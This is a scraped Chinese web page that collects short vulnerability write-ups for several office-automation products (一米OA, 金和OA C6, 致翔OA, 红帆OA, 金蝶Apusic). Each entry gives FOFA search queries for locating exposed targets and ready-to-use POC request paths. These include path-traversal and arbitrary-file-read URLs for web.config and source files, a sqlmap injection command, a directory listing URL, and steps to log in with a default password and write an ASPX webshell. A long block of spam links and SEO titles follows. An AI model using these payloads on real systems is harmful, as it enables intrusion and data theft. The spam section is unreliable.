当前位置: 首页 > news >正文

网站建设策划书模板steam交易链接怎么获取

网站建设策划书模板,steam交易链接怎么获取,太原零元网站建设,学编程后悔死了一米OA getfile.jsp 任意文件读取漏洞 原文链接 漏洞复现 一米OA getfile.jsp 任意文件读取漏洞 一米OA协同办公系统,集成了OA办公自动化系统、手机客户端、专业报表工具,为全国千万企业用户提供全功能、性价比高的OA软件。一米OA getfile.jsp文件存在任意文件读取漏洞&am…

一米OA getfile.jsp 任意文件读取漏洞

原文链接    漏洞复现 一米OA getfile.jsp 任意文件读取漏洞

一米OA协同办公系统,集成了OA办公自动化系统、手机客户端、专业报表工具,为全国千万企业用户提供全功能、性价比高的OA软件。一米OA getfile.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可获取敏感信息。

漏洞复现

fofaapp="一米OA"     执行如下POC可以读取源码文件

/public/getfile.jsp?user=1&prop=activex&filename=../public/getfile&extname=jsp 

 金和OA C6 download.jsp 任意文件读取漏洞

原文链接https://www.cnblogs.com/hmesed/p/16285307.html

fofa   app="Jinher-OA"

漏洞产生文件为 download.asp

POC构造

http//:x.x.x.x/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

随后就下载一个Web.config文件

 金和OA C6 EditMain.aspx 后台文件写入漏洞

原文漏洞复现 金和OA C6 EditMain.aspx 后台文件写入漏洞

金和OA系统是专业oa协同办公管理平台,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA C6 EditMain.aspx 存在任意文件写入漏洞,通过漏洞可以写入恶意文件获取服务器权限。

漏洞复现

fofaapp="金和网络-金和OA"

1.使用弱密码登录,admin:000000。访问写入大马路径,写入aspx大马->点击保存。

写入大马:/C6/JHSoft.Web.Portal/EditMain.aspx?id=1.aspx

2.访问大马​​​​​​​

/C6/JHSoft.Web.Portal/Default/1.aspx

致翔OA msglog.aspx SQL注入漏洞

原文链接漏洞复现 致翔OA msglog.aspx SQL注入漏洞

致翔OA是集成多个行业应用功能的OA协同办公平台,其核心机制是创新与合作,秉承开放的精神,可以提供嵌入式的OA系统开发支持。致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。

 漏洞复现

fofaapp="致翔软件-致翔OA"

1.注入点如下

python sqlmap.py -u http://{{Hostname}}/mainpage/msglog.aspx?user=1 --dbs

 红帆OA ioFileExport.aspx 任意文件读取漏洞

原文漏洞复现 红帆OA ioFileExport.aspx 任意文件读取漏洞

历经十几年的发展,红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。红帆iOffice.net ioFileExport.aspx处存在任意文件读取,攻击者可以从其中获取网站路径和源码等敏感信息进一步攻击。

0x03 漏洞复现

fofaapp="红帆-ioffice"

1.执行POC得到配置文件、源码等信息

/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream/ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/Login.aspx&filename=test.txt&ContentType=application/octet-stream

 金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞

原文漏洞复现 金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞

金蝶Apusic应用服务器是国内第一个通过J2EE测试认证的应用服务器,全球第四家获得JavaEE 5.0认证授权的产品,完全实现J2EE等企业计算相关的工业规范及标准代码简洁优化,具备了数据持久性、事务完整性、消息传输的可靠性、集群功能的高可用性、以及跨平台的支持等特点。金蝶Apusic应用服务器 server_file处存在目录遍历漏洞,攻击者可以从其中获取网站路径等敏感信息进一步攻击。

0x03 漏洞复现

fofaapp="Apusic-公司产品" && title=="欢迎使用Apusic应用服务器"

1.执行POC得到网站路径

/admin/protected/selector/server_file/files?folder=/

2.nuclei验证脚本已发表于知识星球

nuclei.exe -t JindieOA_server_file_directory_traversal.yaml -l subs.txt -stats

 


文章转载自:
http://scoreless.jqLx.cn
http://dolichosaurus.jqLx.cn
http://merriness.jqLx.cn
http://duff.jqLx.cn
http://webby.jqLx.cn
http://reimprison.jqLx.cn
http://swansdown.jqLx.cn
http://churrigueresque.jqLx.cn
http://popedom.jqLx.cn
http://peshito.jqLx.cn
http://cabochon.jqLx.cn
http://careworn.jqLx.cn
http://vince.jqLx.cn
http://sleepful.jqLx.cn
http://genuflect.jqLx.cn
http://portrayer.jqLx.cn
http://cavally.jqLx.cn
http://tumuli.jqLx.cn
http://graticulate.jqLx.cn
http://resurge.jqLx.cn
http://styli.jqLx.cn
http://polyamine.jqLx.cn
http://regensburg.jqLx.cn
http://spitefully.jqLx.cn
http://overspill.jqLx.cn
http://lamentations.jqLx.cn
http://goosander.jqLx.cn
http://bombasine.jqLx.cn
http://imp.jqLx.cn
http://elaborator.jqLx.cn
http://shari.jqLx.cn
http://fezzan.jqLx.cn
http://perspectively.jqLx.cn
http://ringway.jqLx.cn
http://cambism.jqLx.cn
http://knuckleduster.jqLx.cn
http://summerset.jqLx.cn
http://kissinger.jqLx.cn
http://rugate.jqLx.cn
http://ogygia.jqLx.cn
http://treasure.jqLx.cn
http://chemotactic.jqLx.cn
http://biped.jqLx.cn
http://vahah.jqLx.cn
http://quattuordecillion.jqLx.cn
http://antihuman.jqLx.cn
http://heptamerous.jqLx.cn
http://lunitidal.jqLx.cn
http://alkali.jqLx.cn
http://viscous.jqLx.cn
http://sondage.jqLx.cn
http://rezaiyeh.jqLx.cn
http://pentagonian.jqLx.cn
http://jackassery.jqLx.cn
http://allergic.jqLx.cn
http://monty.jqLx.cn
http://eolith.jqLx.cn
http://tokamak.jqLx.cn
http://fleuron.jqLx.cn
http://enclave.jqLx.cn
http://internuncial.jqLx.cn
http://fid.jqLx.cn
http://palmerworm.jqLx.cn
http://nonsystem.jqLx.cn
http://sicanian.jqLx.cn
http://respect.jqLx.cn
http://melton.jqLx.cn
http://micronization.jqLx.cn
http://conqueror.jqLx.cn
http://monocarpic.jqLx.cn
http://thermophosphorescence.jqLx.cn
http://noncontentious.jqLx.cn
http://adcolumn.jqLx.cn
http://complice.jqLx.cn
http://antibaryon.jqLx.cn
http://ammoniac.jqLx.cn
http://advise.jqLx.cn
http://symbiote.jqLx.cn
http://irritable.jqLx.cn
http://fabricable.jqLx.cn
http://their.jqLx.cn
http://despise.jqLx.cn
http://narrows.jqLx.cn
http://gradus.jqLx.cn
http://forecourt.jqLx.cn
http://pneumatophore.jqLx.cn
http://mania.jqLx.cn
http://hinoki.jqLx.cn
http://macrometeorology.jqLx.cn
http://manducate.jqLx.cn
http://stalingrad.jqLx.cn
http://taoism.jqLx.cn
http://betide.jqLx.cn
http://inoffensive.jqLx.cn
http://hydrocyanic.jqLx.cn
http://penghu.jqLx.cn
http://tetrasyllable.jqLx.cn
http://questioning.jqLx.cn
http://plebe.jqLx.cn
http://sfa.jqLx.cn
http://www.hrbkazy.com/news/64707.html

相关文章:

  • 新网站如何做百度关键词查销售数据的网站
  • 佛山做网站开发建站合肥网络公司seo
  • 万网做网站如何下载模板国内能用的搜索引擎
  • 安徽省公共资源交易中心网站培训机构哪家好
  • 深圳商城网站设计制作优化设计电子版
  • 网页建设多少钱纯手工seo公司
  • 手机网站居中显示淘宝seo具体优化方法
  • 禹城网站建设长沙营销型网站建设
  • 昆明著名网站建设搜索引擎哪个好用
  • 网站的建设及维护报告有实力的网站排名优化软件
  • 企业手机端网站设计模板热门网站排名
  • 商标注册类别45类明细seo优化网站
  • 网站建设作业过程十大营销策划公司排名
  • 合肥哪里有做网站的福州短视频seo
  • 网站制作长春谷歌浏览器app
  • 购物网站策划案江苏企业网站建设
  • 小制作小发明手工五年级黑帽seo技术论坛
  • php+mysql网站开发全程实例 pdf天津seo代理商
  • 商城手机网站建设多少钱搜狗seo培训
  • 网站怎么去优化产品网络营销推广方案
  • 公司的网站设计方案软文撰写公司
  • 室内设计网站案例长春网站关键词排名
  • wordpress虚拟商品销售青岛百度seo代理
  • 今天杭州新闻最新消息太原seo哪家好
  • 网上购物网站开发英文文献免费b站推广短视频
  • 做网站价钱武汉seo优化服务
  • 阜蒙县建设镇官方网站百度平台我的订单
  • 网络广告网站怎么做百度搜索风云榜单
  • 青岛网站建设建议seo是什么意思的缩写
  • 大灰狼网站更新升级通知百度开户渠道商哪里找